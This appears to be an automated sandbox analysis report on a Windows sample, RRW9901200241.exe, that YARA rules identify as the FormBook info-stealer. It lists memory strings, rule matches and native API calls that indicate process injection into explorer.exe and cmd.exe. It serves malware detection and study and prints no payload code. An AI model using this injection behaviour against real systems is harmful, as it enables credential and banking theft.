70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.346593091.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: cmd.exe, 00000004.00000002.679859333.0000000003A2F000.00000004.00000001.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419D50 NtCreateFile,2_2_00419D50
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419E00 NtReadFile,2_2_00419E00
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419E80 NtClose,2_2_00419E80
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419F30 NtAllocateVirtualMemory,2_2_00419F30
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419E4C NtReadFile,2_2_00419E4C
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419F2E NtAllocateVirtualMemory,2_2_00419F2E
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01539910
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015399A0 NtCreateSection,LdrInitializeThunk,2_2_015399A0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539840 NtDelayExecution,LdrInitializeThunk,2_2_01539840
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01539860
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015398F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_015398F0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539A50 NtCreateFile,LdrInitializeThunk,2_2_01539A50
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01539A00
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539A20 NtResumeThread,LdrInitializeThunk,2_2_01539A20
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539540 NtReadFile,LdrInitializeThunk,2_2_01539540
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015395D0 NtClose,LdrInitializeThunk,2_2_015395D0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539710 NtQueryInformationToken,LdrInitializeThunk,2_2_01539710
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539780 NtMapViewOfSection,LdrInitializeThunk,2_2_01539780
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015397A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_015397A0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01539660
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015396E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_015396E0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539950 NtQueueApcThread,2_2_01539950
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015399D0 NtCreateProcessEx,2_2_015399D0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0153B040 NtSuspendThread,2_2_0153B040
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539820 NtEnumerateKey,2_2_01539820
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015398A0 NtWriteVirtualMemory,2_2_015398A0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539B00 NtSetValueKey,2_2_01539B00
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0153A3B0 NtGetContextThread,2_2_0153A3B0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539A10 NtQuerySection,2_2_01539A10
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539A80 NtOpenDirectoryObject,2_2_01539A80
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539560 NtWriteFile,2_2_01539560
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0153AD30 NtSetContextThread,2_2_0153AD30
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539520 NtWaitForSingleObject,2_2_01539520
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015395F0 NtQueryInformationFile,2_2_015395F0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539770 NtSetInformationFile,2_2_01539770
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0153A770 NtOpenThread,2_2_0153A770
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539760 NtOpenProcess,2_2_01539760
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0153A710 NtOpenProcessToken,2_2_0153A710
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539730 NtQueryVirtualMemory,2_2_01539730
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539FE0 NtCreateMutant,2_2_01539FE0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539650 NtQueryValueKey,2_2_01539650
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539670 NtQueryInformationProcess,2_2_01539670
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539610 NtEnumerateValueKey,2_2_01539610
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015396D0 NtCreateKey,2_2_015396D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AB42E NtOpenThreadToken,NtOpenProcessToken,NtClose,4_2_002AB42E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A58A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,4_2_002A58A4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A84BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,4_2_002A84BE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AB4F8 NtQueryInformationToken,NtQueryInformationToken,4_2_002AB4F8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AB4C0 NtQueryInformationToken,4_2_002AB4C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,4_2_002C6D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002CB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,4_2_002CB5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C9AB4 NtSetInformationFile,4_2_002C9AB4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A83F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,4_2_002A83F2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9A50 NtCreateFile,LdrInitializeThunk,4_2_02FD9A50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9860 NtQuerySystemInformation,LdrInitializeThunk,4_2_02FD9860
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9840 NtDelayExecution,LdrInitializeThunk,4_2_02FD9840
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD99A0 NtCreateSection,LdrInitializeThunk,4_2_02FD99A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_02FD9910
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD96E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02FD96E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD96D0 NtCreateKey,LdrInitializeThunk,4_2_02FD96D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9FE0 NtCreateMutant,LdrInitializeThunk,4_2_02FD9FE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9780 NtMapViewOfSection,LdrInitializeThunk,4_2_02FD9780
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9710 NtQueryInformationToken,LdrInitializeThunk,4_2_02FD9710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD95D0 NtClose,LdrInitializeThunk,4_2_02FD95D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9540 NtReadFile,LdrInitializeThunk,4_2_02FD9540
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9A80 NtOpenDirectoryObject,4_2_02FD9A80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9A20 NtResumeThread,4_2_02FD9A20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9A10 NtQuerySection,4_2_02FD9A10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9A00 NtProtectVirtualMemory,4_2_02FD9A00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FDA3B0 NtGetContextThread,4_2_02FDA3B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9B00 NtSetValueKey,4_2_02FD9B00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD98F0 NtReadVirtualMemory,4_2_02FD98F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD98A0 NtWriteVirtualMemory,4_2_02FD98A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FDB040 NtSuspendThread,4_2_02FDB040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9820 NtEnumerateKey,4_2_02FD9820
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD99D0 NtCreateProcessEx,4_2_02FD99D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9950 NtQueueApcThread,4_2_02FD9950
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9670 NtQueryInformationProcess,4_2_02FD9670
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9660 NtAllocateVirtualMemory,4_2_02FD9660
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9650 NtQueryValueKey,4_2_02FD9650
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9610 NtEnumerateValueKey,4_2_02FD9610
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD97A0 NtUnmapViewOfSection,4_2_02FD97A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FDA770 NtOpenThread,4_2_02FDA770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9770 NtSetInformationFile,4_2_02FD9770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9760 NtOpenProcess,4_2_02FD9760
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9730 NtQueryVirtualMemory,4_2_02FD9730
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FDA710 NtOpenProcessToken,4_2_02FDA710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD95F0 NtQueryInformationFile,4_2_02FD95F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9560 NtWriteFile,4_2_02FD9560
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FDAD30 NtSetContextThread,4_2_02FDAD30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9520 NtWaitForSingleObject,4_2_02FD9520
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B6550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,4_2_002B6550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,4_2_002B374E
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D8D8C90_2_00D8D8C9
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D8A8F10_2_00D8A8F1
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D960600_2_00D96060
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D955800_2_00D95580
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D9515C0_2_00D9515C
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D979310_2_00D97931
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D95AF00_2_00D95AF0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D967DC0_2_00D967DC
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D903D20_2_00D903D2
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041D87D2_2_0041D87D
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041D9852_2_0041D985
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041DA2B2_2_0041DA2B
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041D4082_2_0041D408
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041DCF92_2_0041DCF9
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041D52D2_2_0041D52D
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00409E302_2_00409E30
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041E7452_2_0041E745
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041DFC52_2_0041DFC5
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041CF932_2_0041CF93
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D8D8C92_2_00D8D8C9
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D8A8F12_2_00D8A8F1
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D960602_2_00D96060
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D9515C2_2_00D9515C
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D979312_2_00D97931
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D95AF02_2_00D95AF0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D903D22_2_00D903D2
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D955802_2_00D95580
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D967DC2_2_00D967DC
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FF9002_2_014FF900
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015141202_2_01514120
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B10022_2_015B1002
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015CE8242_2_015CE824
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C28EC2_2_015C28EC
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150B0902_2_0150B090
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015220A02_2_015220A0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C20A82_2_015C20A8
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C2B282_2_015C2B28
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BDBD22_2_015BDBD2
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152EBB02_2_0152EBB0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C22AE2_2_015C22AE
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C1D552_2_015C1D55
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C2D072_2_015C2D07
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F0D202_2_014F0D20
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C25DD2_2_015C25DD
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150D5E02_2_0150D5E0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015225812_2_01522581
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BD4662_2_015BD466
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150841F2_2_0150841F
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C1FF12_2_015C1FF1
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BD6162_2_015BD616
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01516E302_2_01516E30
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C2EF72_2_015C2EF7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AD8034_2_002AD803
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AE0404_2_002AE040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C5CEA4_2_002C5CEA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A48E64_2_002A48E6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A9CF04_2_002A9CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C35064_2_002C3506
